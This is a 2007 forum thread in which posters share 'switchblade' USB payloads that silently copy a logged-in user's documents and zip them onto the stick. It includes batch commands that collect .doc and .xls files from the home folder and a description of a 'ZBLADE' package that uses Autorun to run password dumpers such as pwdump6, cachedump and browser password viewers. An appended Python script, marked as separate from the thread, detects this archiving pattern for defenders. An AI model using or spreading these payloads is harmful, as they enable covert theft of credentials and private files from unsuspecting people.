kz26
Posted June 3, 2007

Using a switchblade to dump a user's files can get very large. It would be in everyone's interest to maximize their drive's usefulness by first compressing the entire contents of a switchblade dump. I accomplished this using InfoZip, which is a small and portable ZIP creation program very suitable for a switchblade environment. It doesn't seem like anyone has implemented this before, so I'll post it here.

Step 1. Visit http://www.info-zip.org/Zip.html#Win32 and download InfoZip 2.32 from any of the mirrors.
Step 2. Put zip.exe in your switchblade's main program directory.
Step 3. Add the appropriate code for ZIP-compressing the user's files and/or the produced dump logfiles.

REM Create Zip of user's files with the following extensions
set dumpext = *.doc *.docx *.xls *.xlsx *.cls
zip.exe -r9q ..dumps%computername%%computername%-files.zip "%homedrive%%homepath%" -i %dumpext%
REM Zip Dumpfiles
zip.exe -m9jDq ..dumps%computername%%computername%.zip ..dumps%computername%*.txt

Feel free to improve upon this idea. I hope people will find this practical and efficient.

kz26 (Author)
Posted June 4, 2007

UPDATE: I've updated my own ZBLADE custom payload to use the ZIP technique. Here's a description:

ZBLADE

List of programs
* pwdump6 1.5.0
* cachedump 1.2beta
* NirCmd 1.85
* MessenPass v1.10
* IE PassView v1.04
* Protected Storage PassView v1.63
* Network Password Recovery v1.10
* ProduKey v1.06
* FirePassword 2.0.1
* InfoZip/Zip 2.32

Installation
Input the Windows drive letter of your removable media as prompted below. For example, if your drive was the F drive, type in "F:" without the quotes.

Program Features
This ZBLADE package is designed for use on a writable removable media such as a USB flash drive or Zip disk. The silent-run capability is dependent on the Autorun/Autoplay feature of Windows (manual run is required if Autorun/Autoplay is disabled.) The program runs the password dumpers as listed above and gathers basic information about the logged-in user and the computer. Its most special feature is the ability to copy certain filetypes from the user's account to the removable media. All dumped/generated files are compressed using InfoZip into tidy, convenient packages.

The download is a WinRAR SFX installer for the ZBLADE. Link is in my signature.

elmer
Posted June 15, 2007

You could also integrate RAR into your payload. I made a payload that RAR's up the My Documents folder onto the thumbdrive. I haven't tried to RAR the logs, but it could be another solution to the same problem. I got my rar.exe file from the HackSaw, and I am not sure where to get a standalone copy.
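
Added example, not part of any post in this thread: a defender-side check that scans process-creation records for the pattern the posts describe, a zip.exe or rar.exe image started from a non-fixed drive with a recursive flag and a source path inside a user profile. The event fields, the fixed-drive list, the profile roots and the sample records are assumptions constructed for illustration.

```python
import ntpath
import re
import shlex

ARCHIVERS = {"zip.exe", "rar.exe"}        # the two archivers named in this thread
FIXED_DRIVES = {"C:"}                     # assumption: any other drive is removable
PROFILE_ROOTS = ("c:\\users\\", "c:\\documents and settings\\")  # assumed roots
RECURSE_FLAG = re.compile(r"^-[a-z0-9]*r", re.IGNORECASE)  # e.g. -r or -r9q

def assess(event):
    """Return the reasons an event looks like bulk archiving onto removable media."""
    image = event["image"]
    drive = ntpath.splitdrive(image)[0].upper()
    if ntpath.basename(image).lower() not in ARCHIVERS:
        return []
    if not drive or drive in FIXED_DRIVES:
        return []
    reasons = [f"archiver image on non-fixed drive {drive}"]
    # posix=False keeps backslashes literal, as in a Windows command line
    args = [a.strip('"') for a in shlex.split(event["command_line"], posix=False)][1:]
    if any(RECURSE_FLAG.match(a) for a in args):
        reasons.append("recursive flag")
    if any(a.lower().startswith(PROFILE_ROOTS) for a in args):
        reasons.append("source inside a user profile")
    return reasons

def detect(events):
    """Alert when the base condition holds plus at least one more indicator."""
    return {e["pid"]: r for e in events if len(r := assess(e)) >= 2}

# Constructed sample records (not real logs): one match, two benign cases
SAMPLE_EVENTS = [
    {"pid": 4120, "image": "F:\\tools\\zip.exe",
     "command_line": 'zip.exe -r9q out.zip "C:\\Documents and Settings\\alice" -i *.doc *.xls'},
    {"pid": 4188, "image": "C:\\Program Files\\InfoZip\\zip.exe",
     "command_line": 'zip.exe -r9q backup.zip "C:\\Users\\alice\\project"'},
    {"pid": 4200, "image": "F:\\tools\\zip.exe",
     "command_line": "zip.exe -9 notes.zip notes.txt"},
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

The same records can come from any process-creation log source that carries the image path and full command line; the second indicator requirement keeps a single portable archiver run on a USB stick from alerting on its own.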